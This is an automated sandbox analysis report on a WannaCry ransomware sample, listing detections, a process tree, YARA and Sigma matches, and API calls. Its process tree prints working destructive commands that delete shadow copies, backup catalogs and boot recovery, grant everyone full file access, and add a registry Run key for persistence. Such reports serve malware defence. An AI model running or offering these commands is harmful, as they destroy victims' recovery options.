Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2N2jefqo8e.exe

Overview

General Information

Sample Name:2N2jefqo8e.exe
Analysis ID:795237
MD5:84c82835a5d21bbcf75a61706d8ab549
SHA1:5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256:ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
Infos:

Detection

Wannacry, Conti
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Conti ransomware
Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Antivirus / Scanner detection for submitted sample
Sigma detected: Delete shadow copy via WMIC
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Installs TOR (Internet Anonymizer)
Creates files in the recycle bin to hide itself
Found Tor onion address
Command shell drops VBS files
Uses bcdedit to modify the Windows boot settings
Machine Learning detection for sample
Drops PE files to the document folder of the user
Modifies existing user documents (likely ransomware behavior)
Writes many files with high entropy
Contains functionalty to change the wallpaper
Machine Learning detection for dropped file
May use the Tor software to hide its network traffic
Deletes shadow drive data (may be related to ransomware)
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Drops files with a non-matching file extension (content does not match file extension)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Found evaded block containing many API calls
PE file contains more sections than normal
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • 2N2jefqo8e.exe (PID: 5208 cmdline: C:\Users\user\Desktop\2N2jefqo8e.exe MD5: 84C82835A5D21BBCF75A61706D8AB549)
    • attrib.exe (PID: 7956 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • icacls.exe (PID: 7940 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • taskdl.exe (PID: 4828 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • cmd.exe (PID: 7480 cmdline: C:\Windows\system32\cmd.exe /c 140021675181576.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cscript.exe (PID: 408 cmdline: cscript.exe //nologo m.vbs MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
    • taskdl.exe (PID: 4828 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1672 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2756 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1576 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1612 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskhsvc.exe (PID: 1260 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
        • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7944 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • @WanaDecryptor@.exe (PID: 2044 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • cmd.exe (PID: 7408 cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WMIC.exe (PID: 7140 cmdline: wmic shadowcopy delete MD5: 82BB8430531876FBF5266E53460A393E)
    • taskse.exe (PID: 1368 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
    • @WanaDecryptor@.exe (PID: 2660 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • cmd.exe (PID: 2684 cmdline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • reg.exe (PID: 3376 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • taskdl.exe (PID: 5168 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskse.exe (PID: 7556 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
    • @WanaDecryptor@.exe (PID: 3168 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7572 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskse.exe (PID: 2428 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
    • @WanaDecryptor@.exe (PID: 7600 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
2N2jefqo8e.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x342d41:$x2: taskdl.exe
  • 0x35962d:$x2: taskdl.exe
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x359d91:$s2: Windows 10 -->
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x3591ff:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
2N2jefqo8e.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    2N2jefqo8e.exeWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
    2N2jefqo8e.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
    • 0x2c0:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
    C:\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
    • 0x2c0:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
    C:\Users\user\Desktop\r.wnryWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
    • 0x27c:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
    C:\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
    • 0x2c0:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
    C:\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
    • 0x2c0:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
    Click to see the 42 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
          00000032.00000000.3719845976.000000000041F000.00000008.00000001.01000000.00000008.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
            Click to see the 14 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            29.0.@WanaDecryptor@.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
              29.0.@WanaDecryptor@.exe.400000.0.unpackWin32_Ransomware_WannaCryunknownReversingLabs
              • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
              • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
              • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
              38.2.@WanaDecryptor@.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
                38.2.@WanaDecryptor@.exe.400000.0.unpackWin32_Ransomware_WannaCryunknownReversingLabs
                • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
                • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
                • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
                25.2.@WanaDecryptor@.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
                  Click to see the 19 entries

                  Sigma Signatures

                  Operating System Destruction

                  barindex
                  Sigma detected: Delete shadow copy via WMIC
                  Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 2044, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 7408, ProcessName: cmd.exe

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: 2N2jefqo8e.exeVirustotal: Detection: 92%Perma Link
                  Source: 2N2jefqo8e.exeReversingLabs: Detection: 95%
                  Antivirus / Scanner detection for submitted sample
                  Source: 2N2jefqo8e.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: TR/FileCoder.724645
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: TR/FileCoder.724645
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Multi AV Scanner detection for dropped file
                  Source: C:\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\@WanaDecryptor@.exeVirustotal: Detection: 91%Perma Link
                  Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\Desktop\taskdl.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\Desktop\taskse.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\Desktop\u.wnryReversingLabs: Detection: 96%
                  Source: C:\Users\user\Documents\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\Downloads\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\Default\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\Public\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Machine Learning detection for sample
                  Source: 2N2jefqo8e.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped file
                  Source: C:\@WanaDecryptor@.exeJoe Sandbox ML: detected
                  Source: C:\@WanaDecryptor@.exeJoe Sandbox ML: detected
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpackAvira: Label: TR/Ransom.JB
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,25_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,25_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004046F0 CryptImportKey,25_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004046B0 CryptAcquireContextA,25_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,25_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,25_2_004047C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,29_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,29_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,29_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004046F0 CryptImportKey,29_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004046B0 CryptAcquireContextA,29_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,29_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,29_2_004047C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,38_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,38_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,38_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004046F0 CryptImportKey,38_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004046B0 CryptAcquireContextA,38_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,38_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,38_2_004047C0
                  Source: taskhsvc.exe, 0000001E.00000003.5233677563.00000000034A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----
                  Source: 2N2jefqo8e.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 92.205.17.93:443 -> 192.168.11.20:49825 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.205.17.93:443 -> 192.168.11.20:49853 version: TLS 1.2
                  Source: C:\Users\user\Desktop\taskdl.exeCode function: 7_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,7_2_00401080
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,25_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,25_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,25_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,29_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,29_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,29_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,38_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,38_2_00403CB0
